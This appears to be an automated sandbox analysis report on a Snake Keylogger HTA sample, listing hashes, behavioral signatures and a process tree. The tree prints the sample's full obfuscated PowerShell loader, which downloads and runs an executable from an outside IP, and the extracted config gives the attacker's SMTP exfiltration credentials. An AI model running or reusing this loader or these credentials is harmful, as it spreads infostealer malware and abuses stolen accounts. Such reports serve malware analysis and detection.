Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
06-10-2024 18:45
Static task
static1
Behavioral task
behavioral1
Sample
na.hta
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
na.hta
Resource
win10v2004-20240802-en
General
-
Target
na.hta
-
Size
116KB
-
MD5
bac652fa9a932e3f71411fb993010377
-
SHA1
0dbe1f2b08510b57f0e00189d2355f57e300c47f
-
SHA256
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916
-
SHA512
0ab2913b55e1f60cdb26f003d2c17b492385a43bca2d2c5acb1a659c9a5ed3d232eeceb8b0d4b68ffad11599dab9c27d16d1c990f23e54ea3a8ccd73a4de536f
-
SSDEEP
96:Ea+M73mAWZeuhtAWZDuhogROBHRj/oyYJQAWZSAWZXuhdAWZkAT:Ea+Q3mVkuhtVVuhhRwHxY+VgVFuhdVZT
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1920-39-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1920-38-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1920-40-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2312 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2312 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2692 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2312 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0009000000016fb3-30.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2692 set thread context of 1920 2692 taskhostw.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2312 powershell.exe 2312 powershell.exe 2312 powershell.exe 1920 RegSvcs.exe 1920 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2692 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 1920 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1648 wrote to memory of 1960 1648 mshta.exe 31 PID 1648 wrote to memory of 1960 1648 mshta.exe 31 PID 1648 wrote to memory of 1960 1648 mshta.exe 31 PID 1648 wrote to memory of 1960 1648 mshta.exe 31 PID 1960 wrote to memory of 2312 1960 cmd.exe 33 PID 1960 wrote to memory of 2312 1960 cmd.exe 33 PID 1960 wrote to memory of 2312 1960 cmd.exe 33 PID 1960 wrote to memory of 2312 1960 cmd.exe 33 PID 2312 wrote to memory of 2812 2312 powershell.exe 34 PID 2312 wrote to memory of 2812 2312 powershell.exe 34 PID 2312 wrote to memory of 2812 2312 powershell.exe 34 PID 2312 wrote to memory of 2812 2312 powershell.exe 34 PID 2812 wrote to memory of 2172 2812 csc.exe 35 PID 2812 wrote to memory of 2172 2812 csc.exe 35 PID 2812 wrote to memory of 2172 2812 csc.exe 35 PID 2812 wrote to memory of 2172 2812 csc.exe 35 PID 2312 wrote to memory of 2692 2312 powershell.exe 37 PID 2312 wrote to memory of 2692 2312 powershell.exe 37 PID 2312 wrote to memory of 2692 2312 powershell.exe 37 PID 2312 wrote to memory of 2692 2312 powershell.exe 37 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 PID 2692 wrote to memory of 1920 2692 taskhostw.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mi7ij4ls.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD441.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD440.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2172
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1920
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5eb8a52e350113e2d8804228045b7c678
SHA11e68956ba42f83e775045679f41de8f0f95895f5
SHA2568696ed082bdd58e29899d8830cc7f715c08d6bfd4f4152da1c0791961684c219
SHA512eb7bd22d24dded4a638a8e7a67f129cf81db173e18c5a39c086c15adee88bb0f93828d027c997d6e670917ab6e68ae002fe67e5aacb4fe1313804366a7b02660
-
Filesize
3KB
MD52d62237ab7f16e7a4abc0dfc0cf46ed0
SHA1d08c3415f5844cf1b6561a4f3751d84b1748c225
SHA256e72d27c9e5b64a466b0c7d77021e8cc8dea6e0283e769ffd46ec102999594a9f
SHA5122ce2c1f5cca58af29792de506a6d2a4cbe9d7d5a8d257cc699ddeb762e2c3aac68dbd410c5c8b239ace61ac8c0bdfec10f4cf20ab4cfe759d44b70b2a1daaceb
-
Filesize
7KB
MD50d6ea39bdd60803cde10e97b71042544
SHA1ee5eb858657f8f1d321cb2c8ee9643cd975ebcd9
SHA25651308989d470b84f8fe5eeefce76022679d6aefdd7b41c383af9ba83a0e95660
SHA51299cb387c20887d3fdcc9a5baf13b954e843b84bbd2174db503aa29ea961b76ce2f4aee96cca912cf52caefba26ebf5e85a36f4dd041f93ecf617f53e74701d28
-
Filesize
934KB
MD5d515411b9a3c0d9fb13b9c6a928a7fd0
SHA1f940a7302ac76567c15efb1a15d789b42224aac3
SHA2567b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
SHA512447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6
-
Filesize
652B
MD53a253530799b94dfd6acc923899c34cf
SHA15541612e863ac5c6ac157af762b390eac918434c
SHA25689b9440c23b9cbedf9b7b9f0e11dba56f8bc9fa9351d0c38f8be8b548f31a965
SHA512a50cb6e26951800622f42438706dc6acb97fa741bfd8776487fa2888508155e44b8efbcec55e4ad74f09c72014446fc86f7380e31ede4ec8613c897316dbb4aa
-
Filesize
489B
MD566cd8bc31e61e003cddb2ea81c47016a
SHA1b9172635caecd693d1476d08c9cecb5777ea49bb
SHA2560ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
SHA5126dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
-
Filesize
309B
MD520edda0746b621fae093035ca0fa440b
SHA1ee05c2058df62712686df68d254a95de35495451
SHA25683d22f261014e94704bb5ed9be95915209aff3df38861a536602b923de7eb9b3
SHA51260f4f08828e9017b4143a490ac1b8e065503ca8fa4a5fc3910016a93a756e9be7dcfbd344c5e7f59ff296b169b19855e1a7ae72d69a2e3a35ef38fe28bf05be0